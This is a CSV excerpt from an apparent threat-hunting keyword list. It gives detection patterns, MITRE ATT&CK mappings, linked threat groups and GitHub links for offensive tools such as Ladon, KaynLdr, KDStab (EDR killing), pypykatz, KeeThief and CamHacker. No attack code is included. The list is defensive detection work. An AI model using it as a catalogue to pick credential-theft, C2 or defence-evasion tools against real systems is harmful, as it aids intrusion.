"*KaliLadon.*",".{0,1000}KaliLadon\..{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","50202"
"*kali-linux*.7z*",".{0,1000}kali\-linux.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50203"
"*kali-linux*.img*",".{0,1000}kali\-linux.{0,1000}\.img.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50204"
"*kali-linux*.iso*",".{0,1000}kali\-linux.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50205"
"*kali-linux-*.torrent*",".{0,1000}kali\-linux\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50206"
"*kali-linux-*.vmdk*",".{0,1000}kali\-linux\-.{0,1000}\.vmdk.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50207"
"*kali-linux-*.vmwarevm*",".{0,1000}kali\-linux\-.{0,1000}\.vmwarevm.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50208"
"*kali-linux-*.vmx*",".{0,1000}kali\-linux\-.{0,1000}\.vmx.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50209"
"*kali-linux-*-installer-amd64.iso*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-amd64\.iso.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50210"
"*kali-linux-*-installer-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-installer\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50211"
"*kali-linux-*-live-everything-amd64.iso.torrent*",".{0,1000}kali\-linux\-.{0,1000}\-live\-everything\-amd64\.iso\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50212"
"*kali-linux-*-raspberry-pi-armhf.img.xz*",".{0,1000}kali\-linux\-.{0,1000}\-raspberry\-pi\-armhf\.img\.xz.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50213"
"*kali-linux-*-virtualbox-amd64.ova*",".{0,1000}kali\-linux\-.{0,1000}\-virtualbox\-amd64\.ova.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50214"
"*kali-linux-*-vmware-amd64.7z*",".{0,1000}kali\-linux\-.{0,1000}\-vmware\-amd64\.7z.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50215"
"*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","50216"
"*kalilinux/kali-rolling*",".{0,1000}kalilinux\/kali\-rolling.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","50217"
"*kali-rolling main contrib non-free*",".{0,1000}kali\-rolling\smain\scontrib\snon\-free.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","50218"
"*kalitorify*",".{0,1000}kalitorify.{0,1000}","offensive_tool_keyword","kalitorify","kalitorify is a shell script for Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","#linux","N/A","N/A","10","1113","238","2024-04-18T07:11:44Z","2016-02-03T20:42:46Z","50219"
"*kaluche/bloodhound-quickwin*",".{0,1000}kaluche\/bloodhound\-quickwin.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","50220"
"*kancotdiq/wpaf*",".{0,1000}kancotdiq\/wpaf.{0,1000}","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","N/A","1","80","15","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z","50221"
"*karendm/ADHunt*",".{0,1000}karendm\/ADHunt.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","N/A","AD Enumeration","7","1","46","10","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z","50222"
"*karing.martin+confusercoc@gmail.com*",".{0,1000}karing\.martin\+confusercoc\@gmail\.com.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","50223"
"*Karkas66/CelestialSpark*",".{0,1000}Karkas66\/CelestialSpark.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","1","N/A","N/A","10","10","103","10","2025-03-27T12:47:34Z","2024-04-11T12:17:22Z","50224"
"*Karmaleon.py*",".{0,1000}Karmaleon\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","50225"
"*karmaSMB.py*",".{0,1000}karmaSMB\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","50226"
"*KasRoudra/CamHacker*",".{0,1000}KasRoudra\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","N/A","10","","N/A","","","","50228"
"*kasroudrard@gmail.com*",".{0,1000}kasroudrard\@gmail\.com.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#email","N/A","10","","N/A","","","","50229"
"*katoolin*toollist.py*",".{0,1000}katoolin.{0,1000}toollist\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","50230"
"*katoolin3.py*",".{0,1000}katoolin3\.py.{0,1000}","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/s-h-3-l-l/katoolin3","1","1","#linux","N/A","N/A","4","370","120","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z","50231"
"*KatzSystemArchitecture*",".{0,1000}KatzSystemArchitecture.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","50232"
"*KaynInject.x64.exe*",".{0,1000}KaynInject\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50234"
"*KaynInject.x86.exe*",".{0,1000}KaynInject\.x86\.exe.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50235"
"*KAYNINJECT_KAYNINJECT_H*",".{0,1000}KAYNINJECT_KAYNINJECT_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50236"
"*KaynLdr.x64.dll*",".{0,1000}KaynLdr\.x64\.dll.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","1","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50237"
"*KAYNLDR_KAYNLDR_H*",".{0,1000}KAYNLDR_KAYNLDR_H.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","N/A","9","6","532","108","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z","50238"
"*KaynStrike.x64.bin*",".{0,1000}KaynStrike\.x64\.bin.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","50239"
"*KaynStrike.x64.exe*",".{0,1000}KaynStrike\.x64\.exe.{0,1000}","offensive_tool_keyword","KaynStrike","A User Defined Reflective Loader for Cobalt Strike Beacon that spoofs the thread start address and frees itself after entry point was executed.","T1055 - T1036 - T1070 - T1055.012 - T1055.001","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynStrike","1","1","N/A","N/A","9","5","422","66","2023-12-03T18:05:11Z","2022-05-30T04:22:59Z","50240"
"*KBDPAYLOAD.dll*",".{0,1000}KBDPAYLOAD\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","N/A","10","","N/A","","","","50241"
"*KCMTicketFormatter.py*",".{0,1000}KCMTicketFormatter\.py.{0,1000}","offensive_tool_keyword","KCMTicketFormatter","Format SSSD Raw Kerberos Payloads into CCACHE files for use on Windows systems","T1558.003 - T1550.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/blacklanternsecurity/KCMTicketFormatter","1","1","N/A","N/A","7","1","37","4","2021-05-26T20:23:56Z","2021-05-26T20:17:33Z","50244"
"*KcpPassword.cs*",".{0,1000}KcpPassword\.cs.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50246"
"*kdcdump2john.py*",".{0,1000}kdcdump2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50247"
"*KDot227/SomalifuscatorV2*",".{0,1000}KDot227\/SomalifuscatorV2.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","1","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","50248"
"*kdstab * /CHECK*",".{0,1000}kdstab\s.{0,1000}\s\/CHECK.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50249"
"*kdstab * /CLOSE*",".{0,1000}kdstab\s.{0,1000}\s\/CLOSE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50250"
"*kdstab * /DRIVER*",".{0,1000}kdstab\s.{0,1000}\s\/DRIVER.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50251"
"*kdstab * /KILL*",".{0,1000}kdstab\s.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50252"
